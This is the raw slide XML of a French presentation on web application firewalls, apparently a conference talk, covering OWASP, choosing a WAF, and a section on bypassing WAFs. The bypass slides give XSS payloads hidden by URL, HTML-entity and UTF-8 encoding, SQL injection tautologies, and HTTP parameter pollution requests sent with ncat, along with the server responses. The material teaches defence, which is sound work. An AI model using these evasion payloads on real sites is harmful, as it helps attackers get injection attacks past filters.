            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="ctr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Sera inefficace!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="36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/>
              <a:t>L’OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Web Application Firewalls (WAF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Choisir son WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>WAF Mythes et réalités</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>WAF mode d’emploi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>S’amuser avec son WAF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Et après ?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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>WAFs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5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Encodage URL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%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%58%53%53%29%3b%3c%2f%73%63%72%69%70%74%3e%0a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Encodage HTML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&amp;#x3c;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3e;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x58;&amp;#x53;&amp;#x53;&amp;#x29;&amp;#x3b;&amp;#x3c;&amp;#x2f;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3e;&amp;#x0a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Encode UTF-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%u003c%uff53%uff43%uff52%uff49%uff50%uff54%u003e%uff41%uff4c%uff45%uff52%uff54%uff08%uff38%uff33%uff33%uff09%u003c%u2215%uff53%uff43%uff52%uff49%uff50%uff54%u003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5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Un petit espace 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&lt; s c r i p t &gt; a l e r t ( X S S ) ; &lt; / s c r i p t &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Un petit CR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&lt;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s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00FF01"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="382588" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="-65" charset="2"/>
              <a:buChar char="&lt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Un mix des deux ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="782638" lvl="2"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%3c%20%73%20%63%20%72%20%69%20%70%20%74%20%3e%20%0a%61%20%6c%20%65%20%72%20%74%20%28%20%58%20%53%20%53%20%29%20%3b%20%3c%20%2f%20%73%20%63%20%0a%72%20%69%20%70%20%74%20%3e%0a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33600" y="1066800"/>
            <a:ext cx="4419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Le coup de l’encodage et de l’espace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(XSS);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>WAFs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5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"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Prenons la chaine a 130 millions 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OR 1==1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ID=1%20OR%201==1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ID=1%20OR%200x01==0x01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ID=1%20OR%2042==42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ID=1&amp;ID=%20OR%20&amp;ID=1&amp;ID=%3&amp;ID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>d&amp;ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>=%3&amp;ID=d&amp;1</a:t>
            </a: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33600" y="1066800"/>
            <a:ext cx="526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Et l’on ne parle par du reste (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>SQL-i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, HPP, …)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Égal 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="2895600"/>
            <a:ext cx="990600" cy="533400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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Égal 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3886200"/>
            <a:ext cx="990600" cy="533400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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Égal 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="4876800"/>
            <a:ext cx="990600" cy="533400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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Parenthèse fermante 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="2667000"/>
            <a:ext cx="1524000" cy="3276600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBracke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1800" y="3429000"/>
            <a:ext cx="23622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Tout ceci est valide et équivalent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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>WAFs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> – le coup de la pollution des paramètres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1000" y="1224439"/>
            <a:ext cx="8305800" cy="41857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FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ncat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--ssl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www.wafforwimps.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 443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GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test.aspx?val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert(Falken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);&lt;/script&gt; HTTP/1.0</a:t>
            </a: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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1 407 Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication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Required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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Date: Thu, 03 Sep 2009 3:47:19 GMT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Server: IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Last-Modified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Mon, 28 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2008 14:45:31 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept-Ranges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bytes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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/html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Via: 1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.wafforwimps.org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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: MISS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill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</a:rPr>
              <a:t>www.wafforwimps.org</a:t>
            </a:r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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: close</a:t>
            </a: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r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bgcolor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=#FFFFFF&gt;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  &lt;h1&gt;System </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/h1&gt;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  &lt;p&gt;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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #&lt;b&gt;3&lt;/b&gt;...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR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Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>WAFs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> – le coup de la pollution des paramètres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3400" y="1524000"/>
            <a:ext cx="8305800" cy="4893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rgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.wafforwimps.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 443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GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test.aspx?val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;&amp;val=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script&amp;val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&gt;&amp;val=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alert&amp;val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=(&amp;val=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fal&amp;val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>K&amp;val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en&amp;val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=) &amp;val=; &amp;val=&lt;&amp;val=/&amp;val=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script&amp;val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&gt; HTTP/1.0</a:t>
            </a:r>
          </a:p>
          <a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP/1.1 200 Ok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Date: Thu, 03 Sep 2009 4:47:19 GMT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Server: IIS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Last-Modified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Mon, 28 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2008 14:45:31 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept-Ranges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/html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Via: 1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.wafforwimps.org</a:t>
            </a:r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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: MISS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.wafforwimps.org</a:t>
            </a:r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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: close</a:t>
            </a:r>
          </a:p>
          <a:p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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"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"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&gt;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&lt;html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmlns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
